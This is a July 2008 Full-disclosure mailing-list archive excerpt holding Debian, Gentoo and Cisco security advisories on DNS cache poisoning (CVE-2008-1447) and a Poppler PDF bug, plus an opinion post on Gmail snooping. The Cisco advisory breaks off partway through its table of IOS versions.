debian.org http://www.debian.org/security/ Florian Weimer July 08, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : glibc Vulnerability : DNS cache poisoning Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1447 CERT advisory : VU#800113 Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS spoofing and cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting. At this time, it is not possible to implement the recommended countermeasures in the GNU libc stub resolver. The following workarounds are available: 1. Install a local BIND 9 resoler on the host, possibly in forward-only mode. BIND 9 will then use source port randomization when sending queries over the network. (Other caching resolvers can be used instead.) 2. Rely on IP address spoofing protection if available. Successful attacks must spoof the address of one of the resolvers, which may not be possible if the network is guarded properly against IP spoofing attacks (both from internal and external sources). This DSA will be updated when patches for hardening the stub resolver are available. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSHOIFr97/wQC1SS+AQIscwf+KBKMT4hcpB5TCNE+0v1DNBHiQ4rh7ktz KiOyLWEJOaxOrpsR8siA6B6newiLe5KfwojDikqSCXbubTCeicj79HTCx5DzzhTm aa3HePARxmtN1AuyFCebOfklibTtyY/gpwydCdAVBiV0+LmD+jXy9Jx4AfyuibXZ VaqkUTj5sUUQn5CacdI1zc1Ky1rzbzRBBoNJ1D1rRBU1wjoGsvVjBV9p24j/1E2c mYtbY3g1FKmhnOTLBac/AAW62ZQ44yf4QcGgwV8CULfi5c2QmGiRYZioWDVd0pfZ hr2h/Vmjs2qgf8B9FmYet0hEGm6SrEryT2ievlqXkpul0MYtHjJ5iw== =CMHb -----END PGP SIGNATURE----- From xploitable at gmail.com Tue Jul 8 19:46:29 2008 From: xploitable at gmail.com (n3td3v) Date: Tue, 8 Jul 2008 19:46:29 +0100 Subject: [Full-disclosure] Fwd: Comments on: Google powers up users' Gmail security arsenal In-Reply-To: <1463f4c30807081131j19a0f12ci202738d1a5c8eca5@mail.gmail.com> References: <1463f4c30807081131j19a0f12ci202738d1a5c8eca5@mail.gmail.com> Message-ID: <4b6ee9310807081146u2a36febeye958f32da8f0741f@mail.gmail.com> ---------- Forwarded message ---------- From: newsgroup Date: Tue, Jul 8, 2008 at 7:31 PM Subject: Comments on: Google powers up users' Gmail security arsenal To: n3td3v at googlegroups.com by n3td3v July 8, 2008 11:23 AM @ReVeLaTeD Not all users with access to your Gmail account want to change the password, they want to read emails stealthily and thats all. Raising suspicion by letting the victim know you're there isn't something they want to do. If they kicked you out and changed the password they wouldn't be able to read your emails anymore, hence why they don't kick you out and change the password. You've got to remember why people break into web mail accounts in the first place, its not to steal your account, its to read emails and gather intelligence. However, this feature is pointless in the sense of detecting if the government is snooping, as the government monitor your Gmail account in different ways. This feature is only going to detect low-level snooping by bedroom teens, criminals and stalkers. The end game is, the government are still reading your web emails and won't show up on this system. It is a stupid feature in the sense its giving gullible Gmail users a false sense of security in that, if they see no rogue IP addresses logging into their Gmail account, that they think no one is snooping and reading their emails, that isn't the case. This system won't detect government snooping, the government simply send a national security letter to Google Mail and they are granted full access to backend visualisation stats, graphs and other neat features to watch everything thats going on with your Gmail account. You can probably bet this system purposely ignores known government addresses anyway in an agreement between the government and Google, so yeah completely misleading system this is. All the best, n3td3v http://news.cnet.com/8601-13577_3-9985264.html?hhTest&communityId=2072&targetCommunityId=2072&messageId=753919#753919 From vorlon at gentoo.org Tue Jul 8 19:48:06 2008 From: vorlon at gentoo.org (Matthias Geerdsen) Date: Tue, 08 Jul 2008 20:48:06 +0200 Subject: [Full-disclosure] [ GLSA 200807-04 ] Poppler: User-assisted execution of arbitrary code Message-ID: <4873B666.1030207@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200807-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Poppler: User-assisted execution of arbitrary code Date: July 08, 2008 Bugs: #229931 ID: 200807-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Poppler is affected by a memory management issue, which could lead to the execution of arbitrary code. Background ========== Poppler is a cross-platform PDF rendering library originally based on Xpdf. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-text/poppler < 0.6.3-r1 >= 0.6.3-r1 Description =========== Felipe Andres Manzano reported a memory management issue in the Page class constructor/destructor. Impact ====== A remote attacker could entice a user to open a specially crafted PDF file with a Poppler-based PDF viewer such as Gentoo's Xpdf, Epdfview, or Evince, potentially resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All poppler users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-text/poppler-0.6.3-r1" References ========== [ 1 ] CVE-2008-2950 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2950 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200807-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080708/c69539e3/attachment.bin From psirt at cisco.com Tue Jul 8 19:36:40 2008 From: psirt at cisco.com (Cisco Systems Product Security Incident Response Team) Date: Tue, 8 Jul 2008 14:36:40 -0400 Subject: [Full-disclosure] Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks Message-ID: <200807081436.dns@psirt.cisco.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks Advisory ID: cisco-sa-20080708-dns http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml Revision 1.0 For Public Release 2008 July 08 1800 UTC (GMT) Summary ======= Multiple Cisco products are vulnerable to DNS cache poisoning attacks due to their use of insufficiently randomized DNS transaction IDs and UDP source ports in the DNS queries that they produce, which may allow an attacker to more easily forge DNS answers that can poison DNS caches. To exploit this vulnerability an attacker must be able to cause a vulnerable DNS server to perform recursive DNS queries. Therefore, DNS servers that are only authoritative, or servers where recursion is not allowed, are not affected. Cisco has released free software updates that address this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml. This security advisory is being published simultaneously with announcements from other affected organizations. Affected Products ================= Products that cache DNS responses and process DNS messages with the recursion desired (RD) flag set may be vulnerable to a DNS cache poisoning attack depending on implementation of the DNS protocol. Products that process DNS messages with the RD flag set will attempt to answer the question asked on behalf of the client. A product is only affected if using a vulnerable implementation of the DNS protocol, the DNS server functionality for the product is enabled, and the DNS feature for the product is configured to process recursive DNS query messages. Vulnerable Products +------------------ The following Cisco products are capable of acting as DNS servers and have been found to have the DNS implementation weakness that makes some types of DNS cache poisoning attacks more likely to succeed: * Cisco IOS Software A device that is running Cisco IOS Software will be affected if it is running a vulnerable version and if it is acting as a DNS server. All Cisco IOS Software releases that support the DNS server functionality and that have not had their DNS implementation improved are affected. For information about specific fixed versions, please refer to the Software Versions and Fixes section. A device that is running Cisco IOS Software is configured to act as a DNS server if the command "ip dns server" is present in the configuration. This command is not enabled by default. * Cisco Network Registrar All Cisco Network Registrar versions are affected, and DNS services are enabled by default. The DNS server on CNR is enabled via the command-line interface (CLI) commands "server dns enable start-on-reboot" or "dns enable start-on-reboot" or via the web management interface in the Servers page by selecting the appropriate "Start," "Stop," or "Reload" button. * Cisco Application and Content Networking System All Cisco Application and Content Networking System (ACNS) versions are affected; DNS services are disabled by default. ACNS is configured to act as a DNS server if the command "dns enable" is present in the configuration. * Cisco Global Site Selector Used in Combination with Cisco Network Registrar The Cisco Global Site Selector (GSS) is affected when it is used in combination with Cisco Network Registrar software to provide a more complete DNS solution. Fixed software would come in the form of an update of the Cisco Network Registrar software rather than an update of the GSS software. Products Confirmed Not Vulnerable +-------------------------------- Products that do not offer DNS server capabilities are not affected by this vulnerability. The Cisco GSS by itself is not affected by this vulnerability. However, it is affected when it is used with Cisco Network Registrar software. No other Cisco products are currently known to be affected by these vulnerabilities. Details ======= The Domain Name System is an integral part of networks that are based on TCP/IP such as the Internet. Simply stated, the Domain Name System is a hierarchical database that contains mappings of hostnames and IP addresses. The DNS protocol is part of the TCP/IP protocol suite and allows DNS clients to query the DNS database to resolve hostnames to IP addresses. A DNS server is an application that implements the DNS protocol and that has the ability to respond to queries made by DNS clients. When handling a query from a DNS client, a DNS server can look into its portion of the global DNS database (if the query is for a portion of the DNS database for which the DNS server is authoritative), or it can relay the query to other DNS servers (if it is configured to do so and if the query is for a portion of the DNS database for which the DNS server is not authoritative.) Because of the processing time and bandwidth that is associated with handling a DNS query, most DNS servers locally store responses that are received from other DNS servers. The area where these responses are stored locally is called a "cache." Once a response is stored in a cache, the DNS server can use the locally stored response for a certain time (called the "time to live") before having to query DNS servers again to refresh the local (cached) copy of the response. A DNS cache poisoning attack is an attack in which an entry in the DNS cache of a DNS server is changed so the IP address associated with a hostname in the cache does not point to the correct place. For example, if www.example.com is mapped to the IP address 192.168.0.1 and this mapping is present in the cache of a DNS server, an attacker who succeeds in poisoning the DNS cache of this server may be able to map www.example.com to 10.0.0.1 instead. If this happens, a user who is trying to visit www.example.com may end up contacting the wrong web server. Although DNS cache poisoning attacks are not new, a security researcher recently presented a technique that allows an attacker to mount successful DNS cache poisoning attacks with low complexity tools and low traffic requirements. This technique exploits a weakness in most implementations of the DNS protocol. The fundamental implementation weakness is that the DNS transaction ID and source port number used to validate DNS responses are not sufficiently randomized and can easily be predicted, which allows an attacker to create forged responses to DNS queries that will match the expected values. The DNS server will consider such responses to be valid. The following Cisco products that offer DNS server functionality have been found to be susceptible to DNS cache poisoning attacks: * Cisco IOS Software: The vulnerability documented in Cisco bug ID CSCso81854. * Cisco Network Registrar: The vulnerability documented in Cisco bug ID CSCsq01298. * Cisco Application and Content Networking System (ACNS): The vulnerability documented in Cisco bug ID CSCsq21930. This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID CVE-2008-1447. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss Cisco Bugs: * DNS cache prone to poisoning/forged answers attacks (CSCsq21930) * DNS susceptible to forged query response attacks (CSCsq01298) * Need to make DNS implementation more resilient against forged answers (CSCso81854) CVSS Base Score - 6.4 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - Partial Availability Impact - Partial CVSS Temporal Score - 5.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed (same score for the three Cisco bugs listed above.) Impact ====== Successful exploitation of the vulnerability described in this document may result in invalid hostname-to-IP address mappings in the cache of an affected DNS server. This may lead users of this DNS server to contact the wrong provider of network services. The ultimate impact varies greatly, ranging from a simple denial of service (for example, making www.example.com resolve to 127.0.0.1) to phishing and financial fraud. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Cisco IOS Software +----------------- Each row of the Cisco IOS Software table (below) names a Cisco IOS Software release train. If a given release train is vulnerable, then the earliest possible releases that contain the fix (along with the anticipated date of availability for each, if applicable) are listed in the "First Fixed Release" column of the table. The "Recommended Release" column indicates the releases which have fixes for all the published vulnerabilities at the time of this Advisory. A device running a release in the given train that is earlier than the release in a specific column (less than the First Fixed Release) is known to be vulnerable. Cisco recommends upgrading to a release equal to or later than the release in the "Recommended Releases" column of the table. +----------------------------------------+ | Major | Availability of | | Release | Repaired Releases | |------------+---------------------------| | Affected | First Fixed | Recommended | | 12.0-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | 12.0 | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0DA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)DB | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0DB | release | | | | 12.0(7)DB | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)DC | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0DC | release | | | | 12.0(7)DC | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.0S | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0ST | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0SZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.0T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.0W | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0WC | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.0WT | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Note: | | | | Releases | | | | prior to | | | | 12.0(7)XE1 | | | | are | | | 12.0XE | vulnerable, | | | | release | | | | 12.0(7)XE1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.0XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)XK2 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0XK | release | | | | 12.0(7)XK2 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.0XL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.0(7)XR1 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.0XR | release | | | | 12.0(7)XR1 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.0XS | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.0XW | Not | | | | Vulnerable | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.1-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.1 | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.1AA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1AX | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(22)AY1 | | | | are | | | 12.1AY | vulnerable, | 12.1(22) | | | release | EA11 | | | 12.1(22)AY1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1AZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1CX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1DA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(4)DB1 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.1DB | release | | | | 12.1(4)DB1 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(4)DC2 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.1DC | release | | | | 12.1(4)DC2 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.1E | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(11)EA1 | | | | are | | | 12.1EA | vulnerable, | 12.1(22) | | | release | EA11 | | | 12.1(11)EA1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1EB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EW | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Note: | | | | Releases | | | | prior to | | | | 12.1(8a)EX | | | | are | | | 12.1EX | vulnerable, | | | | release | | | | 12.1(8a)EX | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1EY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1EZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1GA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1GB | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.1T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.1XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XB | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.1(1)XC1 | | | | are | | | | vulnerable, | 12.4(19a) | | 12.1XC | release | | | | 12.1(1)XC1 | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.1XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XP | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XR | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XS | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XT | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1XZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YD | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Note: | | | | Releases | | | | prior to | | | | 12.1(5)YE1 | | | | are | 12.4(19a) | | 12.1YE | vulnerable, | | | | release | 12.4(19b) | | | 12.1(5)YE1 | | | | and later | | | | are not | | | | vulnerable; | | |------------+-------------+-------------| | 12.1YF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.1YJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | Affected | First Fixed | Recommended | | 12.2-Based | Release | Release | | Releases | | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2 | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2B | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2BC | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2BW | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.2(8)BY | | | | are | | | | vulnerable, | 12.4(19a) | | 12.2BY | release | | | | 12.2(8)BY | 12.4(19b) | | | and later | | | | are not | | | | vulnerable; | | | | first fixed | | | | in 12.4 | | |------------+-------------+-------------| | 12.2BZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2CX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2CY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2CZ | Vulnerable; | | | | contact TAC | | |------------+-------------+-------------| | 12.2DA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2DD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2DX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EWA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2EZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2FX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2FY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2FZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2IXF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2JA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2JK | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2MB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2MC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2S | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SBC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SCA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SED | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SEG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SG | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SGA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SL | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SRA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SRB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SRC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SU | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SVA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SVC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SVD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SX | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXF | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SXI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SY | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2SZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2T | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Releases | | | | prior to | | | | 12.2(8) | | | | TPC10d are | | | | vulnerable, | | | 12.2TPC | release | | | | 12.2(8) | | | | TPC10d and | | | | later are | | | | not | | | | vulnerable; | | |------------+-------------+-------------| | 12.2UZ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XA | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XB | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XC | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XE | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XF | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XG | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XH | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XI | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XJ | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XK | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XL | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XM | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XN | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XNA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XO | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XQ | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XR | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XS | Not | | | | Vulnerable | | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XT | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | | Vulnerable; | 12.4(19a) | | 12.2XU | first fixed | | | | in 12.4 | 12.4(19b) | |------------+-------------+-------------| | 12.2XV | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2XW | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YA | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YB | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YC | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YD | Not | | | | Vulnerable | | |------------+-------------+-------------| | 12.2YE | Not | | | | 